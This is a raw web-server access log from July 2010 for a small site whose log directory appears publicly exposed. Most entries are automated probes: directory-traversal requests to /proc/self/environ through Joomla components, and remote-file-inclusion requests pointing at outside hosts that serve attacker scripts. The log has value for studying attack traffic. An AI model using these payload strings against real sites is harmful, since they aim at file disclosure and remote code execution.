99.230.157.48 - - [10/Jul/2010:06:50:23 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:06:56:37 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:06:56:37 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
91.121.92.195 - - [10/Jul/2010:06:56:37 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
78.41.204.220 - - [10/Jul/2010:06:58:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:07:23:54 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
78.41.204.220 - - [10/Jul/2010:07:25:09 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
78.41.204.220 - - [10/Jul/2010:07:25:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
78.41.204.220 - - [10/Jul/2010:07:25:09 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
78.41.204.220 - - [10/Jul/2010:07:28:45 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
69.73.155.53 - - [10/Jul/2010:07:45:05 -0700] "GET /index.php?option=com_joomlaupdater&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:07:47:59 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
69.73.155.53 - - [10/Jul/2010:07:54:32 -0700] "GET /logs/access_100619.log/index.php?option=com_joomlaupdater&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
69.73.155.53 - - [10/Jul/2010:07:54:32 -0700] "GET /index.php?option=com_joomlaupdater&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
69.73.155.53 - - [10/Jul/2010:07:54:32 -0700] "GET /logs/index.php?option=com_joomlaupdater&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:08:05:37 -0700] "GET /logs/access_100619.log/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:08:05:38 -0700] "GET /?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "virtualsupplynet.com"
212.241.251.207 - - [10/Jul/2010:08:05:38 -0700] "GET /logs/?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:08:11:12 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:08:33:57 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:42:40 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:42:40 -0700] "GET /logs/access_100619.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:42:40 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:42:52 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:48:26 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:48:26 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:48:26 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.15.134.78 - - [10/Jul/2010:08:48:35 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:08:57:52 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:09:20:28 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:09:43:48 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:10:06:49 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:10:28:28 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
74.222.3.90 - - [10/Jul/2010:10:48:23 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "page_test (larbin2.6.3@unspecified.mail)" "www.virtualsupplynet.com"
74.222.3.90 - - [10/Jul/2010:10:48:23 -0700] "GET / HTTP/1.0" 200 763 "-" "page_test larbin2.6.3@unspecified.mail" "www.virtualsupplynet.com"
67.195.110.174 - - [10/Jul/2010:10:48:56 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [10/Jul/2010:10:48:57 -0700] "GET /logs/access_100605.log HTTP/1.0" 200 125664 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:10:52:32 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:11:17:03 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
208.80.193.40 - - [10/Jul/2010:11:49:07 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1; (R1 1.5))" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:11:49:36 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:12:26:39 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:12:51:10 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:13:24:43 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:13:55:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:13:55:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:13:55:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:13:55:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:14:00:41 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:14:28:30 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:14:52:26 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:15:16:56 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
67.195.115.249 - - [10/Jul/2010:15:30:37 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:15:40:30 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:16:03:21 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:16:28:55 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
88.250.57.232 - - [10/Jul/2010:16:38:48 -0700] "GET /logs/access_100709.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [10/Jul/2010:16:38:49 -0700] "GET /logs/access_100710.log HTTP/1.0" 200 105686 "-" "Wget/1.11.4" "virtualsupplynet.com"
161.58.219.37 - - [10/Jul/2010:16:43:33 -0700] "GET /logs/login.php?base_dir=http://blog.chetaah.net/wp-content/me.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.virtualsupplynet.com"
161.58.219.37 - - [10/Jul/2010:16:43:33 -0700] "GET /login.php?base_dir=http://blog.chetaah.net/wp-content/me.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.virtualsupplynet.com"
87.98.188.191 - - [10/Jul/2010:16:43:44 -0700] "GET /logs/login.php?base_dir=http://blog.chetaah.net/wp-content/me.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
87.98.188.191 - - [10/Jul/2010:16:43:45 -0700] "GET /login.php?base_dir=http://blog.chetaah.net/wp-content/me.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:16:53:43 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:17:18:36 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:17:50:50 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:18:16:53 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:18:42:38 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:19:11:17 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
77.88.31.246 - - [10/Jul/2010:19:19:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
99.230.157.48 - - [10/Jul/2010:19:58:33 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:20:14:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:20:14:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:20:14:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
83.222.124.106 - - [10/Jul/2010:20:14:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
66.179.49.231 - - [10/Jul/2010:20:15:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "virtualsupplynet.com"
66.179.49.231 - - [10/Jul/2010:20:15:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "virtualsupplynet.com"
66.179.49.231 - - [10/Jul/2010:20:15:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "virtualsupplynet.com"
109.72.85.72 - - [10/Jul/2010:23:01:54 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:02:32 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
109.72.85.72 - - [10/Jul/2010:23:02:37 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
109.72.85.72 - - [10/Jul/2010:23:02:58 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:03:22 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:03:25 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
109.72.85.72 - - [10/Jul/2010:23:04:24 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
109.72.85.72 - - [10/Jul/2010:23:04:25 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:05:36 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.195.110.174 - - [10/Jul/2010:23:05:51 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [10/Jul/2010:23:05:51 -0700] "GET /logs/access_100612.log HTTP/1.0" 200 104934 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:06:13 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.195.115.249 - - [10/Jul/2010:23:10:38 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [10/Jul/2010:23:10:39 -0700] "GET /logs/?D=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:10:56 -0700] "GET /logs/access_100703.log///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:10:56 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:10:56 -0700] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:15:36 -0700] "GET /logs/access_100703.log///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:15:36 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:15:36 -0700] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:16:54 -0700] "GET /logs/access_100619.log///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:16:54 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:16:54 -0700] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:22:56 -0700] "GET /logs/access_100619.log///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:22:56 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:22:57 -0700] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
95.156.233.139 - - [10/Jul/2010:23:22:58 -0700] "GET /logs/access_100619.log///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
